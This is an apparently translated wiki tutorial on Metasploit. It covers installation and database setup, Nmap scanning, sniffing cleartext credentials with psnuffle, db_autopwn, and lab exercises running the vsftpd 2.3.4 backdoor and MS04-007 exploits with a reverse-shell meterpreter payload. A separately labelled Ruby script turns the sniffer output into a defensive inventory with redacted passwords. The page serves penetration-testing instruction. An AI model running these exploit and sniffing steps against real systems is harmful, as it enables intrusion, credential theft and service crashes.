Metasploit

From Peotta-Wiki

Metasploit is a framework created so that vulnerability assessments can be carried out quickly and efficiently. Because it is a security tool, care must be taken so that no application under test stops working correctly.


Note: For testing it is recommended to use purpose-built distributions. [Metasploitable] is a great distro.



Installing Metasploit

On [Backtrack] everything is already installed; in some cases it only needs to be updated to a more recent version.

Version update

# Update the Metasploit version

root@bt:~# apt-get update
root@bt:~# apt-get install framework4

Updating the exploit database

# Update the exploit database

root@bt:~# cd /pentest/exploits/framework2/   # or framework3 or framework4, depending on the installed version
root@bt:~# ./msfupdate

Configuring the database connection

Configuring and checking the connection to the database that will store the assessment data.

Install PostgreSQL

root@bt:~# apt-get install postgresql
root@bt:~# apt-get install pgadmin3

Configure PostgreSQL

$ sudo -u postgres createuser --superuser $USER

$ sudo -u postgres psql
postgres=# \password username
postgres=# \q

# createdb is a shell command, not a psql command, so leave psql before running it
$ createdb metasploit

Using Metasploit

root@bt:~# /usr/local/bin/msfconsole

%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%
%%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%
%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%
%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%
%%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
                                                                                             

       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15728 updated 77 days ago (2012.08.10)

Warning: This copy of the Metasploit Framework was last updated 77 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306

msf >

Check PostgreSQL

root@bt:~# /usr/local/bin/msfconsole

# Check the database. Expected response: "postgresql connected to msf3".

msf > db_status
[*] postgresql connected to msf3dev
msf >

Running Nmap

Running Nmap and storing the results in the database.

msf > db_nmap -sS -sV -T 5 -P0 -O 172.16.40.43

Analysis of insecure protocols

root@bt:~# /usr/local/bin/msfconsole

msf > use auxiliary/sniffer/psnuffle
msf  auxiliary(psnuffle) > show options

Module options (auxiliary/sniffer/psnuffle):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILTER                      no        The filter string for capturing traffic
   INTERFACE                   no        The name of the interface
   PCAPFILE                    no        The name of the PCAP capture file to process
   PROTOCOLS  all              yes       A comma-delimited list of protocols to sniff or "all".
   SNAPLEN    65535            yes       The number of bytes to capture
   TIMEOUT    500              yes       The number of seconds to wait for new data

msf  auxiliary(psnuffle) >

msf  auxiliary(psnuffle) > run
[*] Auxiliary module execution completed

[*] Loaded protocol FTP from /opt/metasploit/msf3/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /opt/metasploit/msf3/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /opt/metasploit/msf3/data/exploits/psnuffle/pop3.rb...
msf  auxiliary(psnuffle) > [*] Loaded protocol SMB from /opt/metasploit/msf3/data/exploits/psnuffle/smb.rb...
[*] Loaded protocol URL from /opt/metasploit/msf3/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
[*] Failed FTP Login: 172.18.174.4:52497-172.18.174.40:21 >> usuario / 123456
[*] Successful FTP Login: 172.18.174.4:52532-172.18.174.40:21 >> root / toor
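The sniffer session above shows why this module matters to a defender: FTP, POP3 and IMAP send credentials in the clear, so anyone on the path can read them. The following Ruby script is an added example, not part of this wiki page or of Metasploit itself. It parses psnuffle login lines like the ones above into an inventory of server endpoints that still accept cleartext authentication (the remediation list for the network owner), and redacts captured passwords instead of copying them into the report. The two FTP lines are taken from the session above; the POP3 line is constructed and assumes the POP3 sniffer reports in the same shape as the FTP one.

```ruby
# Added example (not from the wiki page or Metasploit): turn psnuffle output
# into a defender's inventory of services that accept cleartext credentials.
require 'set'

# Matches lines such as:
#   [*] Successful FTP Login: 172.18.174.4:52532-172.18.174.40:21 >> root / toor
#   [*] Failed FTP Login: 172.18.174.4:52497-172.18.174.40:21 >> usuario / 123456
LOGIN_LINE = /\A\[\*\]\s+(Successful|Failed)\s+(\S+)\s+Login:\s+
              (\d{1,3}(?:\.\d{1,3}){3}):(\d+)-(\d{1,3}(?:\.\d{1,3}){3}):(\d+)
              \s+>>\s+(.*?)\s+\/\s+(.*)\z/x

Event = Struct.new(:outcome, :protocol, :src_ip, :src_port, :dst_ip, :dst_port, :user, :password)

# Sample input: two lines copied from the session above plus one constructed
# POP3 line (assumed to use the same format) and one non-login line.
SAMPLE_LINES = [
  "[*] Sniffing traffic.....",
  "[*] Failed FTP Login: 172.18.174.4:52497-172.18.174.40:21 >> usuario / 123456",
  "[*] Successful FTP Login: 172.18.174.4:52532-172.18.174.40:21 >> root / toor",
  "[*] Successful POP3 Login: 172.18.174.5:40011-172.18.174.41:110 >> alice / hunter2" # constructed
].freeze

# Returns an Event for a psnuffle login line, or nil for any other line.
def parse_psnuffle_line(line)
  m = LOGIN_LINE.match(line.strip)
  return nil unless m
  Event.new(m[1].downcase.to_sym, m[2], m[3], m[4].to_i, m[5], m[6].to_i, m[7], m[8])
end

# Summarise events per server endpoint: protocol, client sources, how many
# logins succeeded or failed, and which usernames were exposed. Passwords are
# deliberately never copied into the inventory.
def cleartext_auth_inventory(lines)
  inventory = Hash.new do |h, k|
    h[k] = { protocol: nil, sources: Set.new, successful: 0, failed: 0, users: Set.new }
  end
  lines.each do |line|
    ev = parse_psnuffle_line(line)
    next unless ev
    entry = inventory["#{ev.dst_ip}:#{ev.dst_port}"]
    entry[:protocol] = ev.protocol
    entry[:sources] << ev.src_ip
    entry[:users] << ev.user
    entry[ev.outcome] += 1 # :successful or :failed
  end
  inventory
end

# One-line description of an event that is safe to put in a ticket or report.
def redact(ev)
  "#{ev.protocol} #{ev.outcome} login #{ev.src_ip}:#{ev.src_port} -> " \
    "#{ev.dst_ip}:#{ev.dst_port} user=#{ev.user} password=<redacted>"
end

if $PROGRAM_NAME == __FILE__
  cleartext_auth_inventory(SAMPLE_LINES).each do |endpoint, info|
    puts "#{endpoint} (#{info[:protocol]}): #{info[:successful]} successful / " \
         "#{info[:failed]} failed logins from #{info[:sources].to_a.join(', ')}; " \
         "users exposed: #{info[:users].to_a.join(', ')}"
  end
end
```

Each endpoint in the inventory is a service that should be moved to an encrypted variant (FTPS/SFTP, POP3S, IMAPS) or retired; the exposed usernames tell you whose passwords need rotating, without the report itself becoming a credential leak.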

Checking for vulnerabilities

msf > db_autopwn -p -e -t

Exercise 1: Exploiting the vsftpd vulnerability

Running a specific test: the vsftpd 2.3.4 backdoor.

Install vsftpd-2.3.4.tar.gz.

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf > set RHOST localhost
msf > set PAYLOAD cmd/unix/interact
msf > exploit

Exercise 2: Exploiting a Windows XP SP1 vulnerability

Microsoft ASN.1 Library Bitstring Heap Overflow

This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. This vulnerability is not related to the bit string vulnerability described in eEye advisory AD20040210-2. Both vulnerabilities were fixed in the MS04-007 patch. You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself in 60 seconds. If the payload succeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. This exploit has been successfully tested with the win32/*/reverse_tcp payloads, however a few problems were encountered when using the equivalent bind payloads.

msf > use exploit/windows/smb/ms04_007_killbill
msf exploit(ms04_007_killbill) > show payloads
msf exploit(ms04_007_killbill) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms04_007_killbill) > set LHOST [MY IP ADDRESS]
msf exploit(ms04_007_killbill) > set RHOST [TARGET IP]
msf exploit(ms04_007_killbill) > exploit